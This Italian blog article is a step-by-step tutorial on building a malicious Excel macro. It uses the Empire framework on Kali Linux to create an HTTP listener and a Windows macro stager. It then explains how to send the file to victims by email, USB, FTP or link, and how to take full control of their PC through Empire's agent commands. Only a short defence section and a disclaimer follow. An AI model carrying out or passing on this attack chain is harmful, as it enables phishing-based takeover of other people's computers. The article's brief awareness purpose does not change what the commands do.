
Non aprire questo foglio Excel! (generazione macro malevola)
Cari lettori di Tecnogalaxy, vi chiederete ancora un altro articolo con un titolo strano? In questo articolo andremo a vedere a quali rischi è possibile andare contro se viene aperto un file excel senza avere il sistema operativo aggiornato e un buon antivirus.
Questa tecnica miscelata con l’ingegneria sociale potrebbe diventare pericolosissima sia per un utente privato che per una azienda. Come tutti i nostri articoli vedremo nel dettaglio come un malintenzionato può mettere in pericolo la nostra sicurezza informatica e quali tecniche utilizzare per difendersi.
Iniziamo il nostro test come sempre utilizzando il nostro caro amico Kali Linux, Windows 10 e un tool di nome Empire scaricabile come sempre da github, una porzione di codice da inserire in una macro di excel e come sempre un po’ di ingegneria sociale.
Un malintenzionato professionista utilizza diversi metodi per violare un sistema e recuperare informazioni utili, la tecnica del Phishing, l’Ingegneria sociale, la creazione di Virus etc….
Creare una macro Excel generata con Kali Linux
La tecnica che utilizzeremo oggi è quella di creare un file Excel e iniettare una macro generata da un tool in Kali Linux.
Apriamo una shell e scriviamo il seguente comando:
cd Scrivania (nel mio caso)
sudo git clone https://github.com/EmpireProject/Empire (per clonare il tool)
cd Empire (posizioniamoci nella cartella del tool)
ls
sudo poetry run python empire
Questo è il menù di navigazione del tool.
Scrivendo il comando help potremo vedere tutte le opzioni disponibili.
Scegliamo il comando:
listeners
Riscriviamo il comando help sempre per vedere tutte le opzioni a disposizione
help
Adesso selezioniamo il comando:
uselistener http
info
set Name loiHTTP
set BindIP 192.168.1.10 (il nostro indirizzo IP)
set Port 8888
info
execute
Adesso ritorniamo al menù principale scrivendo:
back
back
Arrivati al menù principale scriviamo il comando:
usestager
usestager windows/macro
Mandiamo in esecuzione l’opzione scelta scrivendo:
execute
Se tutto sarà andato a buon fine vedremo questo
Adesso dobbiamo verificare lo stato di apache2 se è attivo
systemctl status apache2
Adesso apriamo il browser e scriviamo il nostro indirizzo IP:
192.168.1.10/hackerloimacro
Copiamo tutto il codice in un file di testo
Adesso spostiamoci su Windows e apriamo un file excel ed inseriamo dei valori, andiamo nella parte Macro per crearne una nuova ed inseriamo il codice che abbiamo copiato prima nel file di testo.
Salviamo il file e chiudiamolo.
Adesso entra in campo come dicevamo prima l’ingegneria sociale, il malintenzionato invierà il file appena creato alla vittima cercando di farlo aprire con l’inganno utilizzando nella maggior parte dei casi le tecniche seguenti:
- Via via e-mail
- Tramite una chiavetta USB
- Facendolo scaricare via FTP
- Download tramite un link internet
Torniamo in Kali e attendiamo che la vittima apra il file excel, appena avremo conferma dell’apertura avvenuta scriviamo il comando:
agents
Il tool ci mostrerà diverse informazioni relative al pc della vittima.
Copiamoci il nome sotto il titolo Name e scriviamo il comando:
interact 97WGPDR
Confermiamo… abbiamo l’intero possesso del computer, scriviamo help per vedere le opzioni che abbiamo a disposizione.
Se scriviamo il comando:
info
Potremo vedere diverse informazioni:
Come difendersi dalle macro Excel e in generale
Come dico sempre nel web bisogna essere diffidenti, quando riceviamo una mail con un allegato, dobbiamo essere certi che il mittente sia reale, in caso di dubbi contattare il mittente per chiedere maggiori informazioni.
Non cliccare su link internet presenti nelle mail senza verificare prima la destinazione (abbiamo visto che tecnica utilizzare per vedere la provenienza di un link in qualche articolo precedente).
Quando durante la navigazione venite dirottati su una pagina di login, verificare che il sito sia quello originale e non un fake.
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- I vantaggi in termini di sicurezza derivanti dall’utilizzo delle VDR nelle transazioni immobiliari
- Cos’è il cashback: caratteristiche, utilità, settori
- Wire ha appena ricevuto un finanziamento di 30 milioni
- Woolsocks: Regali di Natale GRATIS
- Come effettuare il Librabet login ed ottenere i premi
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI